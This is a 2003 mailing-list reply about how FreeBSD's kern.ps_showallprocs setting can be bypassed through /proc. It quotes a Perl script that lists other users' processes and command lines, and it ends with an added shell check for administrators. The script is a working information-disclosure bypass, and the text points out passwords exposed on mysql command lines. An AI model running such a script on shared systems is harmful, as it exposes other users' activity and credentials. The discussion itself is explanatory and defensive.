On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> a normal user can see all processes on the box using e.g. /bin/ps;

This topic was addressed on the freebsd-security list a while back, where someone also noted that all user process information can be obtained by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply by looking at the contents of /proc. The following script was also posted by someone to demonstrate this:

    #!/usr/bin/perl
    #
    # hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
    # author: JohnnyB
    #
    # a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
    # option; an option that hides other users process information.
    # (why would they implement such a broken and easily evaded option?)
    # [and no this didnt take any skill. its basically an output format]
    #
    # Tested on FreeBSD 4.5-RC.

    print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
    opendir(DIR,"/proc");
    @procs=readdir(DIR);
    closedir(DIR);

    foreach ${proc} (@procs){
      if(${proc}=~/[0-9]/o){
        unshift(@pids, ${proc});
      }
    }

    foreach $pid (@pids){
      open(FD, "ls -al /proc/$pid/file|");
      while(<FD>){
        chomp;
        ${l}=$_;
        ${l}=~s/\s{1,}/ /g;
        if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
          &ppid(${1},${2},${pid},${3});
        }
      }
      close(FD);
    }
    exit(0);

    sub ppid(){
      (${a},${b},${c},${d})=@_;
      undef(${str});
      undef(${line});
      if(-e "/proc/$c/cmdline"){
        open(heh,"cat /proc/$c/cmdline|");
        @hah=<heh>;
        @chars=split(//,@hah[0]);
        foreach ${chr} (@chars){
          if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
            ${str}.=" ";
          }else{
            ${str}.=${chr};
          }
        }
        ${line}.=${a};
        while(length(${line})<11){${line}.=" ";} #alignment...
        ${line}.=" ".${b};
        while(length(${line})<23){${line}.=" ";}
        ${line}.=" ".${c};
        while(length(${line})<31){${line}.=" ";}
        chop(${str});
        if(${d}eq"unknown"){
          ${str}=~s/\s{1,}//g;
          ${line}.=" ("."${str}".")";
        }else{
          ${line}.=" "."${str}";
        }
        @line=split(//,${line});
        if(length(${line})>80){
          ${cntr}=0;
          foreach ${char} (@line){
            if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
              print "\n"." "x32;
              #^Anything >, deal with the rollover.
            }
            print "${char}";
            ${cntr}++;
          }
          print "\n";
        }
        else{
          print "${line}\n";
        }
        return(0);
      }
    }

I believe someone (last poster in this thread?) also posted a patch on the same list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

    mysql -u user -p mypassword

on the command line, thinking that this info will not show up in ps listings when ps is run by other users. Ho hum...

Regards,
Jez Hancock
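
An administrator-side check for the situation this message describes, added here as an example (it is not part of the original post or of FreeBSD): it reports when kern.ps_showallprocs=0 is set while procfs is still mounted, which is the combination the posted script relies on. The function names and the sample mount lines are constructed for illustration; the mount(8) line format is assumed to be the usual FreeBSD "procfs on /proc (procfs, local)".

```shell
#!/bin/sh
# Added example: audit whether kern.ps_showallprocs=0 is undermined by a
# mounted procfs. Names and sample data below are hypothetical/constructed.

# classify_exposure SYSCTL_VALUE MOUNT_OUTPUT
# Prints one of:
#   open        - ps shows all processes to every user (sysctl is 1)
#   bypassable  - ps is restricted, but procfs is mounted, so per-process
#                 entries under the mount point can still be listed
#   restricted  - ps is restricted and no procfs mount was found
#   unknown     - sysctl value missing or unexpected
classify_exposure() {
    showall=$1
    mounts=$2
    # Look for a procfs filesystem in mount(8)-style output.
    if printf '%s\n' "$mounts" | grep -Eq '^procfs on [^ ]+ \(procfs'; then
        procfs=yes
    else
        procfs=no
    fi
    case "$showall" in
        1) echo open ;;
        0) if [ "$procfs" = yes ]; then echo bypassable; else echo restricted; fi ;;
        *) echo unknown ;;
    esac
}

# Constructed sample mount(8) output, with and without procfs.
SAMPLE_MOUNTS_PROCFS='/dev/ad0s1a on / (ufs, local)
procfs on /proc (procfs, local)
/dev/ad0s1f on /usr (ufs, local, soft-updates)'
SAMPLE_MOUNTS_NOPROCFS='/dev/ad0s1a on / (ufs, local)
/dev/ad0s1f on /usr (ufs, local, soft-updates)'

# Live check on the local host: feeds the real sysctl value and mount table
# into the classifier. Prints "unknown" where the sysctl does not exist.
audit_host() {
    classify_exposure "$(sysctl -n kern.ps_showallprocs 2>/dev/null)" \
                      "$(mount 2>/dev/null)"
}
```

Run `audit_host` on the machine being reviewed; a result of `bypassable` means the sysctl alone is not hiding other users' processes.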